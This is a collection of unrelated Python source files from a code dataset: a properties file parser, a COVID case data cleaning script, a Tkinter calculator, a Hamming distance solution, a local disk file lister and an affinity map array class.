+{"seq_id":"296024102","text":"\"\"\" Class description goes here. \"\"\"\n\n\"\"\"Java `properties` parser.\n\nA simple parser of the *.properties files can be found in this module. It is\nnot a complete and bulletproof implementation, but it is enough for simple\nfiles.\n\nSee PropertyFile class for some considerations about the implementation.\n\"\"\"\n\nimport re\nfrom abc import ABC, abstractmethod\n\n__author__ = \"Alex Barcelo \"\n__copyright__ = \"2015 Barcelona Supercomputing Center (BSC-CNS)\"\n\n\"\"\" Make this class abstract \"\"\"\n\n\nclass PropertyFile(ABC):\n \"\"\"Abstract property-holder class.\n\n All Property Files used in dataClay must have it own class, derived from\n this one. This function provides the basic line-by-line iteration and a\n commonruntime interface, but the details on each line stored data is dependant\n on each file.\n\n WARNING: ** Not implemented **\n - Multiline property lines\n - Escaping sequences\n \"\"\"\n\n _prop_comment = re.compile(r\"\\s*([#!].*)?$\")\n _prop_regular_line = re.compile(r\"\\s*(.*?)\\s*[=:]\\s*(.*)$\")\n\n def __init__(self, file_name):\n \"\"\"Open the file (which is expected to be a properties Java file) and read.\n\n This constructor relies on subclasses implementing their own\n process_line method, which will be called for each line.\n\n :param file_object: An object-like (stream) for the \".properties\" file.\n :return:\n \"\"\"\n with open(file_name, \"r\") as file_object:\n for line in file_object:\n if not self._prop_comment.match(line):\n m = self._prop_regular_line.match(line)\n if m is not None:\n self._process_line(m.group(1), m.group(2))\n\n @abstractmethod\n def _process_line(self, key, value):\n \"\"\"Process a line of the ongoing properties file.\n\n This method should be implemented in derived classes and the internal\n class structure updated according to this properties' file needs.\n\n :param key: The key for the line being processed.\n :param value: The value (string) for the previous key.\n :return: None\n \"\"\"\n return\n\n\nclass PropertyDict(PropertyFile):\n \"\"\"Simple dictionary wrapper for a \"properties\" file.\"\"\"\n\n def __init__(self, file_name):\n super(PropertyDict, self).__init__(file_name)\n\n def _process_line(self, key, value):\n \"\"\"Simply store the values in the internal dictionary.\"\"\"\n self.__dict__[key] = value\n","sub_path":"src/dataclay/util/PropertiesFilesLoader.py","file_name":"PropertiesFilesLoader.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"369314564","text":"import numpy as np\nimport pandas as pd\nimport datetime\nimport Levenshtein\n\nfrom funcoes_auxiliares.otimizacao import *\n\n\ndef delete_wrong_dates(df_atual):\n print('Excluindo datas bsurdas')\n df_atual.idadeCaso = df_atual.idadeCaso.replace(range(101,1001), float(\"nan\"))\n df_atual.loc[df_atual['idadeCaso'] == float(\"nan\"), 'faixaEtaria'] = 'Sem Informacao'\n df_atual.faixaEtaria = df_atual.faixaEtaria.fillna('Sem Informacao')\n dates = ['dataResultadoExame', 'dataInicioSintomas', 'dataColetaExame']\n optimize2(df_atual, dates)\n return df_atual\n\n\ndef remove_columns(df_atual):\n print('Removendo colunas desnecessarias')\n df_atual = df_atual.drop(columns=['idRedcap', 'classificacaoEstadoRedcap', 'idEsus', 'idSivep',\n 'bairroCasoGeocoder', 'tipoObitoMaterno', 'codigoMunicipioCaso', \n 'comorbidadeHiv', 'comorbidadeNeoplasias', 'paisCaso', 'estadoCaso',\n 'dataNascimento', 'requisicaoGal', 'laboratorioExame', 'cnesNotificacaoEsus',\n 'municipioNotificacaoEsus', 'localObito', 'comorbidadePuerperaSivep',\n 'comorbidadeHematologiaSivep', 'comorbidadeSindromeDownSivep',\n 'comorbidadeHepaticaSivep', 'comorbidadeNeurologiaSivep',\n 'comorbidadeImunodeficienciaSivep','comorbidadeRenalSivep', \n 'comorbidadeObesidadeSivep', 'gestante', 'classificacaoEstadoEsus', \n 'classificacaoFinalEsus', 'tipoTesteEsus', 'tipoLocalObito', 'classificacaoObito',\n 'evolucaoCasoEsus', 'evolucaoCasoSivep', 'tipoTesteExame',\n 'comorbidadeCardiovascularSivep', 'comorbidadeAsmaSivep', 'comorbidadeDiabetesSivep', \n 'comorbidadePneumopatiaSivep', 'classificacaoEstadoSivep', 'dataNotificacao', 'dataSolicitacaoExame',\n 'dataInternacaoSivep', 'dataEntradaUTISivep', 'dataSaidaUTISivep', 'dataEvolucaoCasoSivep',\n 'dataNotificacaoObito', 'classificacaoFinalCasoSivep'])\n return df_atual\n\ndef correct_cboEsus(df_atual):\n print(\"Corrigindo profissões\")\n for i in df_atual.cboEsus.value_counts().index.to_list():\n correcao = i.split('-')[1]\n if correcao[0] == ' ':\n correcao = correcao[1:]\n df_atual.cboEsus.replace(i, correcao, inplace=True)\n return df_atual\n\ndef filter_muni(df_atual):\n print('Filtrando dados para Fortaleza')\n correcoes = {}\n for i in df_atual.municipioCaso.value_counts().index:\n lev = Levenshtein.distance(i,'FORTALEZA')\n if lev < 4:\n correcoes[i] = 'FORTALEZA'\n dist = lev\n for i in range(len(list(correcoes))):\n df_atual.municipioCaso = df_atual.municipioCaso.replace(list(correcoes)[i], correcoes[list(correcoes)[i]])\n\n filtro = (df_atual.municipioCaso == 'FORTALEZA')\n df_atual = df_atual[filtro]\n df_atual = df_atual.drop(columns=['municipioCaso'])\n return df_atual\n\n\ndef date_correction(df_atual):\n print('Corrigindo datas')\n anoDeCont = []\n dataCaso = []\n result = df_atual.dataResultadoExame.to_list()\n sintomas = df_atual.dataInicioSintomas.to_list()\n exame = df_atual.dataColetaExame.to_list()\n\n for i in range(len(result)):\n if sintomas[i].year == 2020:\n anoDeCont.append('2020')\n dataCaso.append(sintomas[i])\n elif sintomas[i].year == 2021:\n anoDeCont.append('2021')\n dataCaso.append(sintomas[i])\n else:\n if exame[i].year == 2020:\n anoDeCont.append('2020')\n dataCaso.append(exame[i])\n elif exame[i].year == 2021:\n anoDeCont.append('2021')\n dataCaso.append(exame[i])\n else:\n if result[i].year == 2020:\n anoDeCont.append('2020')\n dataCaso.append(result[i])\n elif result[i].year == 2021:\n anoDeCont.append('2021')\n dataCaso.append(result[i])\n else:\n anoDeCont.append('Excluir')\n dataCaso.append('Excluir')\n df_atual['anoDeContagio'] = anoDeCont\n\n for i in df_atual.columns.to_list(): \n if i[0]+i[1]+i[2]+i[3] == 'data':\n df_atual = df_atual.drop(columns=i)\n df_atual['dataCaso'] = dataCaso\n\n indexNames = df_atual[ (df_atual['dataCaso'] == 'Excluir') |\n (df_atual['anoDeContagio'] == 'Excluir') ].index\n df_atual.drop(indexNames , inplace=True)\n\n return df_atual\n\n\ndef wrong_values(df_atual):\n print('Tratando valores errados')\n\n df_atual.bairroCaso.fillna('Indeterminado', inplace=True)\n\n df_atual.sexoCaso.replace('INDEFINIDO', df_atual.sexoCaso.value_counts().index[0], inplace=True)\n df_atual.sexoCaso.replace('I', df_atual.sexoCaso.value_counts().index[0], inplace=True)\n df_atual.sexoCaso.replace('N.I.', df_atual.sexoCaso.value_counts().index[0], inplace=True)\n df_atual.sexoCaso.fillna(df_atual.sexoCaso.value_counts().index[0], inplace=True)\n\n df_atual.resultadoFinalExame.replace('Provável', 'Caso suspeito', inplace=True)\n df_atual.resultadoFinalExame.replace('Inconclusivo', 'Caso suspeito', inplace=True)\n df_atual.resultadoFinalExame.replace('Em Análise', 'Caso suspeito', inplace=True)\n df_atual.resultadoFinalExame.fillna('Caso suspeito', inplace=True)\n # df_atual.resultadoFinalExame.replace('Negativo', 'Z Negativo', inplace=True)\n\n df_atual.racaCor.replace('Parda.0', 'Parda', inplace=True)\n df_atual.racaCor.replace('.0', 'Sem Informacao', inplace=True)\n df_atual.racaCor.fillna('Sem Informacao', inplace=True)\n df_atual.racaCor.replace('Branca.0', 'Branca', inplace=True)\n df_atual.racaCor.replace('Preta.0', 'Preta', inplace=True)\n df_atual.racaCor.replace('Amarela.0', 'Amarela', inplace=True)\n df_atual.racaCor.replace('Indígena.0', 'Indígena', inplace=True)\n\n df_atual.obitoConfirmado.replace(True, 'Verdadeiro', inplace=True)\n df_atual.obitoConfirmado.replace(False, 'Falso', inplace=True)\n df_atual.obitoConfirmado.fillna('Falso', inplace=True)\n\n return df_atual\n\n\ndef correction_bairro(df_atual, bairro_info):\n print('Corrigindo bairros')\n correcoes = {}\n bairros_cor = bairro_info.index\n for i in df_atual.bairroCaso.value_counts().index:\n dist = 20\n for j in bairros_cor:\n lev = Levenshtein.distance(i,j)\n if dist == 20 and lev < 3:\n correcoes[i] = j\n dist = lev\n elif dist < 20 and lev < dist:\n correcoes[i] = j\n dist = lev\n\n for i in range(len(list(correcoes))):\n df_atual.bairroCaso = df_atual.bairroCaso.replace(list(correcoes)[i], correcoes[list(correcoes)[i]])\n\n filtro = ~ df_atual.bairroCaso.isin(bairros_cor)\n df_atual.loc[filtro, 'bairroCaso'] = 'Indeterminado'\n\n return df_atual\n\n\ndef prof_group(df_atual):\n print('Criando grupos')\n dicGrupo = {'Técnicos e auxiliares de enfermagem' : 'Profissional da saude',\n 'Enfermeiros e afins' : 'Profissional da saude',\n 'Médico' : 'Profissional da saude',\n 'Agente Comunitário de Saúde' : 'Profissional da saude',\n 'Farmacêuticos' : 'Profissional da saude',\n 'Fisioterapeutas' : 'Profissional da saude',\n 'Cirurgião' : 'Profissional da saude',\n 'Psicólogos e psicanalistas' : 'Profissional da saude',\n 'Cuidador em Saúde' : 'Profissional da saude',\n 'Médicos clínicos' : 'Profissional da saude',\n 'Nutricionistas' : 'Profissional da saude',\n 'Policiais' : 'Policial/Exercito/Bombeiros',\n 'Outro tipo de agente de saúde ou visitador sanitário' : 'Profissional da saude',\n 'Agente de Saúde Pública' : 'Profissional da saude',\n 'Profissionais da educação física' : 'Profissionais da Educação',\n 'Vigilantes e guardas de segurança' : 'Policial/Exercito/Bombeiros',\n 'Médicos em medicina diagnóstica e terapêutica' : 'Profissional da saude',\n 'Terapeutas ocupacionais' : 'Profissional da saude',\n 'Condutor de Ambulância' : 'Profissional da saude',\n 'Cabos e soldados da polícia militar' : 'Policial/Exercito/Bombeiros',\n 'Oficiais generais das forças armadas' : 'Policial/Exercito/Bombeiros',\n 'Técnicos de odontologia' : 'Profissional da saude',\n 'Professor de Educação Infantil ou Ensino Fundamental' : 'Profissionais da Educação',\n 'Socorrista não médico e não enfermeiro' : 'Profissional da saude',\n 'Técnico em farmácia e em manipulação farmacêutica' : 'Profissional da saude',\n 'Engenheiros civis e afins' : 'Profissionais da área de construção',\n 'Inspetores de alunos e afins' : 'Profissionais da Educação',\n 'Biomédico' : 'Profissional da saude',\n 'Professor do Ensino Médio' : 'Profissionais da Educação',\n 'Subtenentes e sargentos da policia militar' : 'Policial/Exercito/Bombeiros',\n 'Cozinheiros' : 'Profissionais da área alimentícia',\n 'Profissional da Biotecnologia' : 'Profissional da saude',\n 'Técnicos em transportes aéreos' : 'Transporte',\n 'Contadores e afins' : 'Finanças e Secretariado',\n 'Operadores de máquinas para costura de peças do vestuário' : 'Industria textil',\n 'Outros profissionais de ensino' : 'Profissionais da Educação',\n 'Dirigentes do serviço público' : 'Finanças e Secretariado',\n 'Motoristas de veículos de cargas em geral' : 'Transporte ',\n 'Secretárias(os) executivas(os) e afins' : 'Finanças e Secretariado',\n 'Auxiliares de serviços de documentação' : 'Finanças e Secretariado',\n 'Lavadores e passadores de roupa' : 'Industria textil',\n 'Professor de Ensino Superior' : 'Profissionais da Educação',\n 'Trabalhadores no atendimento em estabelecimentos de serviços de alimentação' : 'Profissionais da área alimentícia',\n 'Trabalhadores nos serviços de manutenção de edificações' : 'Profissionais da área de construção',\n 'Oficiais superiores da polícia militar' : 'Policial/Exercito/Bombeiros',\n 'Arquitetos e urbanistas' : 'Profissionais da área de construção',\n 'Assistentes sociais e economistas domésticos' : 'Finanças e Secretariado',\n 'Motociclistas e ciclistas de entregas rápidas' : 'Profissionais da área alimentícia',\n 'Trabalhadores auxiliares nos serviços de alimentação' : 'Profissionais da área alimentícia',\n 'Delegados de polícia' : 'Policial/Exercito/Bombeiros',\n 'Profissionais de administração ecônomico' : 'Finanças e Secretariado',\n 'Técnicos em construção civil (edificações)' : 'Profissionais da área de construção',\n 'Bombeiros' : 'Policial/Exercito/Bombeiros',\n 'Diretores administrativos e financeiros' : 'Finanças e Secretariado',\n 'Técnico em Eletroeletrônica e Fotônica atuando na área de saúde' : 'T.I., Tecnologias e mecanica',\n 'Tenentes da polícia militar' : 'Policial/Exercito/Bombeiros',\n 'Motoristas de ônibus urbanos' : 'Transporte',\n 'Gerentes de tecnologia da informação' : 'T.I., Tecnologias e mecanica',\n 'Auxiliares de contabilidade' : 'Finanças e Secretariado',\n 'Capitães da polícia militar' : 'Policial/Exercito/Bombeiros',\n 'Ajudantes de obras civis' : 'Profissionais da área de construção',\n 'Técnicos mecânicos (ferramentas)' : 'T.I., Tecnologias e mecanica',\n 'Médicos em especialidades cirúrgicas' : 'Profissional da saude',\n 'Profissionais polivalentes da confecção de roupas' : 'Industria textil',\n 'Chefes de cozinha e afins' : 'Profissionais da área alimentícia',\n 'Professores de nível superior na educação infantil' : 'Profissionais da Educação',\n 'Eletricistas de manutenção eletroeletrônica' : 'T.I., Tecnologias e mecanica',\n 'Técnicos em contabilidade' : 'Finanças e Secretariado',\n 'Professores de nível médio na educação infantil' : 'Profissionais da Educação',\n 'Diretores e gerentes de instituição de serviços educacionais' : 'Profissionais da Educação',\n 'Técnicos em operações e serviços bancários' : 'Finanças e Secretariado',\n 'Padeiros' : 'Profissionais da área alimentícia',\n 'Profissionais da informação' : 'T.I., Tecnologias e mecanica',\n 'Técnicos em construção civil (obras de infraestrutura)' : 'Profissionais da área de construção',\n 'Trabalhadores em registros e informações em saúde' : 'T.I., Tecnologias e mecanica',\n 'Cabos e soldados do corpo de bombeiros militar' : 'Policial/Exercito/Bombeiros',\n 'Técnicos em eletrônica' : 'T.I., Tecnologias e mecanica',\n 'Professores do ensino médio' : 'Profissionais da Educação',\n 'Trabalhadores de segurança e atendimento aos usuários nos transportes' : 'Transporte',\n 'Engenheiros eletricistas' : 'T.I., Tecnologias e mecanica',\n 'Supervisores de serviços financeiros' : 'Finanças e Secretariado',\n 'Operadores de máquinas de costurar e montar calçados' : 'Industria textil',\n 'Supervisores de lavanderia' : 'Industria textil',\n 'Pintores de obras e revestidores de interiores (revestimentos flexíveis)' : 'Profissionais da área de construção',\n 'Administradores de tecnologia da informação' : 'T.I., Tecnologias e mecanica',\n 'Professores de nível superior do ensino fundamental (primeira a quarta séries)' : 'Profissionais da Educação',\n 'Profissionais de direitos autorais e de avaliacão de produtos dos meios de comunicação' : '',\n 'Oficiais de máquinas da marinha mercante' : 'Policial/Exercito/Bombeiros',\n 'Programadores' : 'T.I., Tecnologias e mecanica',\n 'Professores na área de formação pedagógica do ensino superior' : 'Profissionais da Educação',\n 'Professores de nível médio no ensino fundamental' : 'Profissionais da Educação',\n 'Técnicos em secretariado' : 'Finanças e Secretariado',\n 'Designers de interiores' : 'Profissionais da área de construção',\n 'Engenheiro de Alimentos' : 'Profissionais da área alimentícia',\n 'Economistas' : 'Finanças e Secretariado',\n 'Técnicos em eletricidade e eletrotécnica' : 'T.I., Tecnologias e mecanica',\n 'Engenheiros mecânicos e afins' : 'T.I., Tecnologias e mecanica',\n 'Professor de Ensino Profissionalizante' : 'Profissionais da Educação',\n 'Oficiais intermediários do corpo de bombeiros militar' : 'Policial/Exercito/Bombeiros',\n 'Trabalhadores da preparação da confecção de roupas' : 'Industria textil',\n 'Diretores de operações de serviços em instituição de intermediação financeira' : 'Finanças e Secretariado',\n 'Supervisores da construção civil' : 'Profissionais da área de construção',\n 'Gerentes de operações de serviços em empresa de transporte' : 'Transporte',\n 'Professores de educação especial' : 'Profissionais da Educação',\n 'Supervisores na confecção do vestuário' : 'Industria textil',\n 'Supervisores dos serviços de transporte' : 'Transporte',\n 'Mecânicos de manutenção de bombas' : 'T.I., Tecnologias e mecanica',\n 'Trabalhadores de instalações elétricas' : 'Profissionais da área de construção',\n 'Mecânicos de manutenção de veículos automotores' : 'T.I., Tecnologias e mecanica',\n 'Técnicos de suporte e monitoração ao usuário de tecnologia da informação.' : 'T.I., Tecnologias e mecanica',\n 'Subtenentes e sargentos do corpo de bombeiros militar' : 'Policial/Exercito/Bombeiros',\n 'Professores leigos no ensino fundamental' : 'Profissionais da Educação',\n 'Técnicos em manutenção e reparação de equipamentos biomédicos' : 'T.I., Tecnologias e mecanica',\n 'Pesquisadores de engenharia e tecnologia' : 'T.I., Tecnologias e mecanica',\n 'Trabalhadores artesanais da confecção de peças e tecidos' : 'Industria textil',\n 'Instrutores e professores de cursos livres' : 'Profissionais da Educação',\n 'Oficiais superiores do corpo de bombeiros militar' : 'Policial/Exercito/Bombeiros',\n 'Trabalhadores da fabricação de cerâmica estrutural para construção' : 'Profissionais da área de construção',\n 'Engenheiros em computação' : 'T.I., Tecnologias e mecanica',\n 'Supervisores da fabricação de alimentos' : 'Profissionais da área alimentícia',\n 'Técnicos em telecomunicações' : 'T.I., Tecnologias e mecanica',\n 'Mecânicos de manutenção aeronáutica' : 'T.I., Tecnologias e mecanica',\n 'Professores de nível superior no ensino fundamental de quinta a oitava série' : 'Profissionais da Educação',\n 'Desenhistas projetistas de construção civil e arquitetura' : 'Profissionais da área de construção',\n 'Supervisores da indústria têxtil' : 'Industria textil',\n 'Trabalhadores de acabamento de calçados' : 'Industria textil',\n 'Pilotos de aviação comercial' : 'Transporte',\n 'Mecânicos de instrumentos de precisão' : 'T.I., Tecnologias e mecanica',\n 'Trabalhadores agropecuários em geral' : 'Profissionais da área alimentícia',\n 'Inspetores e revisores de produção têxtil' : 'Industria textil',\n 'Instaladores e mantenedores de sistemas eletroeletrônicos de segurança' : 'T.I., Tecnologias e mecanica',\n 'Operadores de tear e máquinas similares' : 'Industria textil',\n 'Aplicadores de revestimentos cerâmicos' : 'Profissionais da área de construção',\n 'Técnicos mecânicos na manutenção de máquinas' : 'T.I., Tecnologias e mecanica',\n 'Professores de artes do ensino superior' : 'Profissionais da Educação',\n 'Técnicos do vestuário' : 'Industria textil',\n 'Supervisores de manutenção eletromecânica' : 'T.I., Tecnologias e mecanica',\n 'Vidreiros e ceramistas (arte e decoração)' : 'Profissionais da área de construção',\n 'Gerentes de obras em empresa de construção' : 'Profissionais da área de construção',\n 'Trabalhadores de tecelagem manual' : 'Industria textil',\n 'Professores do ensino profissional' : 'Profissionais da Educação',\n 'Gerentes operacionais da aviação civil' : 'Transporte',\n 'Trabalhadores polivalentes das indústrias têxteis' : 'Industria textil',\n 'Gerentes de operações de serviços em instituição de intermediação financeira' : 'Finanças e Secretariado',\n 'Tenentes do corpo de bombeiros militar' : 'Policial/Exercito/Bombeiros'}\n\n for i in range(len(list(dicGrupo))):\n df_atual.loc[df_atual.cboEsus == list(dicGrupo)[i], 'profissoes'] = dicGrupo[list(dicGrupo)[i]]\n\n df_atual.drop(columns=['cboEsus'], inplace=True)\n return df_atual\n\n\ndef processing_new_rows(df_atual):\n df_atual = remove_columns(df_atual)\n df_atual = delete_wrong_dates(df_atual)\n df_atual = correct_cboEsus(df_atual)\n df_atual = filter_muni(df_atual)\n df_atual = date_correction(df_atual)\n df_atual = wrong_values(df_atual)\n\n bairro_info = pd.read_csv(f'Base_de_dados/dados_bairros.csv', sep=',')\n bairro_info.Bairros\t= bairro_info.Bairros.str.upper()\n bairro_info = bairro_info.set_index('Bairros')\n\n df_atual = correction_bairro(df_atual, bairro_info)\n df_atual = prof_group(df_atual)\n\n # df_atual.sort_values(by=['resultadoFinalExame'], inplace=True) \n # df_atual.drop_duplicates(subset='identificadorCaso', keep='last', inplace=True)\n # df_atual = df_atual.drop(columns=['identificadorCaso'])\n\n\n df_atual.to_csv('Base_de_dados/dados_limpos.csv', sep=';')\n \n\n \n\n","sub_path":"funcoes_auxiliares/pre_proces.py","file_name":"pre_proces.py","file_ext":"py","file_size_in_byte":20094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"546632681","text":"#!/usr/bin/env python3\r\n#antuor:Alan\r\n \r\nimport re\r\nfrom functools import reduce\r\nfrom tkinter import *\r\n \r\n \r\n \r\n'''处理特殊-号运算'''\r\ndef minus_operation(expresstion):\r\n minus_operators = re.split(\"-\",expresstion)\r\n calc_list = re.findall(\"[0-9]\",expresstion)\r\n if minus_operators[0] ==\"\":\r\n calc_list[0] = '-%s' % calc_list[0]\r\n res = reduce(lambda x,y:float(x)-float(y),calc_list)\r\n print(\">>>>>>>>>>>>>>减号[%s]运算结果:\" % expresstion,res)\r\n return res\r\n \r\n'''reduce()对sequence连续使用function, 如果不给出initial, 则第一次调用传递sequence的两个元素,\r\n以后把前一次调用的结果和sequence的下一个元素传递给function'''\r\n \r\n \r\n \r\n \r\n'''处理双运算符号'''\r\ndef del_duplicates(expresstion):\r\n expresstion = expresstion.replace(\"++\",\"+\")\r\n expresstion = expresstion.replace(\"--\",\"-\")\r\n expresstion = expresstion.replace(\"+-\",\"-\")\r\n expresstion = expresstion.replace(\"--\",\"+\")\r\n expresstion = expresstion.replace('- -',\"+\")\r\n\r\n return expresstion\r\n \r\n'''*/运算函数'''\r\ndef mutiply_dividend(expresstion):\r\n calc_list = re.split(\"[*/]\",expresstion) #用* or /分割公式\r\n operators = re.findall(\"[*/]\",expresstion) #找出所有*和/号\r\n res = None\r\n for index,i in enumerate(calc_list):\r\n if res:\r\n if operators[index-1] =='*':\r\n res *= float(i)\r\n elif operators[index-1] =='/':\r\n res /=float(i)\r\n else :\r\n res = float(i)\r\n procession0 = \"[%s]运算结果=\" % expresstion,res\r\n final_result.insert(END,procession0) #插入窗体\r\n print(procession0)\r\n return res\r\n \r\n \r\n \r\n'''处理运算符号顺序混乱情况'''\r\ndef special_features(plus_and_minus_operators,multiply_and_dividend):\r\n \r\n for index,i in enumerate(multiply_and_dividend):\r\n i = i.strip()\r\n if i.endswith(\"*\") or i.endswith(\"/\"):\r\n multiply_and_dividend[index] = multiply_and_dividend[index] + plus_and_minus_operators[index] + multiply_and_dividend[index+1]\r\n del multiply_and_dividend[index+1]\r\n del plus_and_minus_operators[index]\r\n return plus_and_minus_operators,multiply_and_dividend\r\n \r\n \r\n \r\ndef minus_special(operator_list,calc_list):\r\n for index,i in enumerate(calc_list):\r\n if i =='':\r\n calc_list[index+1] = i + calc_list[index+1].strip()\r\n \r\n \r\n \r\n'''运算除了()的公式+-*/'''\r\ndef figure_up(expresstion):\r\n expresstion = expresstion.strip(\"()\") #去掉外面括号\r\n expresstion = del_duplicates(expresstion) #去掉重复+-号\r\n plus_and_minus_operators = re.findall(\"[+-]\",expresstion)\r\n multiply_and_dividend = re.split(\"[+-]\",expresstion)\r\n if len(multiply_and_dividend[0].strip()) ==0:\r\n multiply_and_dividend[1] = plus_and_minus_operators[0] + multiply_and_dividend[1]\r\n del multiply_and_dividend[0]\r\n del plus_and_minus_operators[0]\r\n \r\n plus_and_minus_operators,multiply_and_dividend = special_features(plus_and_minus_operators,multiply_and_dividend)\r\n for index,i in enumerate(multiply_and_dividend):\r\n if re.search(\"[*/]\",i):\r\n sub_res = mutiply_dividend(i)\r\n multiply_and_dividend[index] = sub_res\r\n \r\n print(multiply_and_dividend,plus_and_minus_operators) #计算\r\n final_res = None\r\n for index,item in enumerate(multiply_and_dividend):\r\n if final_res:\r\n if plus_and_minus_operators[index-1] == '+':\r\n final_res += float(item)\r\n elif plus_and_minus_operators[index-1] == '-':\r\n final_res -= float(item)\r\n else:\r\n final_res = float(item)\r\n procession = '[%s]计算结果:' % expresstion,final_res\r\n final_result.insert(END,procession) #插入窗体\r\n print(procession)\r\n return final_res\r\n \r\n\"\"\"主函数:运算逻辑:先计算拓号里的值,算出来后再算乘除,再算加减\"\"\"\r\ndef calculate():\r\n expresstion = expresstions.get() #获取输入框值\r\n flage = True\r\n calculate_res = None #初始化计算结果为None\r\n while flage:\r\n m = re.search(\"\\([^()]*\\)\",expresstion) #先找最里层的()\r\n # pattern = re.compile(r\"\\([^()]*\\)\")\r\n # m = pattern.match(expresstion)\r\n if m:\r\n sub_res = figure_up(m.group()) #运算()里的公式\r\n expresstion = expresstion.replace(m.group(),str(sub_res)) #运算完毕把结果替换掉公式\r\n else:\r\n print('---------------括号已经计算完毕--------------')\r\n procession1 = \"最终计算结果:\",figure_up(expresstion)\r\n final_result.insert(END,procession1) #插入窗体\r\n print('\\033[31m最终计算结果:',figure_up(expresstion))\r\n \r\n flage = False\r\n \r\n \r\nif __name__==\"__main__\":\r\n # res = calculate(\"1 - 2 * ( (60-30 +(-40/5) * (9-2*5/3 + 7 /3*99/4*2998 +10 * 568/14 )) - (-4*3)/ (16-3*2) )\")\r\n window = Tk() ###创建窗体\r\n window.title('计算器') ###命名窗体\r\n frame1 = Frame(window) ###框架1\r\n frame1.pack() ###放置\r\n frame2 = Frame(window) ###框架2\r\n frame2.pack() ###放置\r\n lable = Label(frame1,text = \"请输入公式:\") ###文字标签\r\n lable.pack()\r\n expresstions = StringVar() ###输入框属性,字符串\r\n entryname = Entry(frame1,textvariable = expresstions) ###文本输入框\r\n bt_get_expresstions = Button(frame1,text = \"提交\",command = calculate) ###按钮挂件\r\n bt_get_expresstions.pack()\r\n entryname.pack()\r\n lable.grid(row=1, column=1) ###位置\r\n entryname.grid(row=1, column=2)\r\n bt_get_expresstions.grid(row=1, column=3)\r\n final_result = Text(frame2) ###计算结果显示框\r\n final_result.tag_config(\"here\", background=\"yellow\", foreground=\"blue\")\r\n final_result.pack()\r\n window.mainloop() ###事件循环","sub_path":"内部模块/计算器ed_err.py","file_name":"计算器ed_err.py","file_ext":"py","file_size_in_byte":5646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"273010579","text":"# Problem available at: https://leetcode.com/explore/challenge/card/july-leetcoding-challenge/544/week-1-july-1st-july-7th/3381/\n\n# Question:\n'''\nThe Hamming distance between two integers is the number of positions at which the corresponding bits are different.\n\nGiven two integers x and y, calculate the Hamming distance.\n'''\n\nclass Solution:\n def hammingDistance(self, x: int, y: int) -> int:\n \n output = x^y\n \n output = bin(output) \n \n return output.count('1')","sub_path":"HammingDistance.py","file_name":"HammingDistance.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"469207830","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Sep 27 11:11:10 2016\r\n\r\n@author: lty765\r\n\"\"\"\r\n'''\r\nneed to add:\r\n\r\n'''\r\n#Seek all files in a certain directory\r\n#nta:file name\r\ntemp = []\r\ndef fileseek(addr):\r\n import os\r\n try:\r\n os.chdir(addr) \r\n for file in os.listdir(addr):\r\n if os.path.isdir(file):\r\n newfile = os.path.join(os.getcwd(),file)\r\n temp.append(fileseek(newfile))\r\n os.chdir('..')\r\n else: \r\n temp.append(file)\r\n except:\r\n pass\r\n\r\n#print(fileseek('H:\\\\python'))\r\n#fileseek('H:\\\\')\r\n\r\n#Get the partition of the harddisk\r\ndef disk(): \r\n import wmi\r\n c = wmi.WMI () \r\n d = []\r\n for physical_disk in c.Win32_DiskDrive (): \r\n for partition in physical_disk.associators (\"Win32_DiskDriveToDiskPartition\"): \r\n for logical_disk in partition.associators (\"Win32_LogicalDiskToPartition\"): \r\n d.append(logical_disk.Caption)\r\n return d\r\n \r\n#print(disk())\r\n\r\n#nta:disk name\r\n#currently not use,spending too much time!\r\ndef diskseek():\r\n hard_disk = disk()\r\n temp = []\r\n for item in hard_disk:\r\n if item != 'C:':\r\n temp.append(fileseek(item+'\\\\'))\r\n return temp\r\n\r\n\r\n#done \r\ndef test(choose_disk='H:'):\r\n disk_now = disk()\r\n if choose_disk in disk_now: \r\n import time\r\n start = time.time()\r\n fileseek(choose_disk+'\\\\')\r\n end = time.time()\r\n cost = end - start\r\n print('Running time: %f'%cost)\r\n else:\r\n print('Disk doesn\\'t exist,please try another disk.')\r\n \r\n \r\ntemp1 = []\r\ndef tree2list(L):\r\n for i in L:\r\n if isinstance(i,list):\r\n tree2list(i)\r\n else:\r\n temp1.append(i) \r\n \r\n \r\ndef file_search(L,*kind):\r\n temp = []\r\n for f in L:\r\n if f!=None:\r\n for k in kind:\r\n if f[-len(k):]==k:\r\n temp.append(f)\r\n return temp \r\n \r\n","sub_path":"sp.py","file_name":"sp.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"593581361","text":"__doc__ = \"\"\"Image chunk class\"\"\"\nimport numpy as np\nfrom chunkflow.chunk import Chunk\n\nclass AffinityMap(Chunk):\n \"\"\"\n a chunk of affinity map. It has x,y,z three channels with single precision.\n \"\"\"\n def __new__(cls, array, **kwargs):\n if 'global_offset' in kwargs:\n global_offset = kwargs['global_offset']\n elif isinstance(array, Chunk):\n global_offset = array.global_offset\n else:\n global_offset = None\n\n assert np.issubdtype(array.dtype, np.floating)\n assert 4 == array.ndim\n assert 3 == array.shape[0] \n obj = Chunk(array, global_offset=global_offset, *kwargs).view(cls)\n return obj\n\n def quantize(self):\n # only use the last channel, it is the Z affinity\n # if this is affinitymap\n image = self[-1, :, :, :]\n image = (image * 255).astype(np.uint8)\n return image\n \n\n\n\n","sub_path":"chunkflow/chunk/affinity_map/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
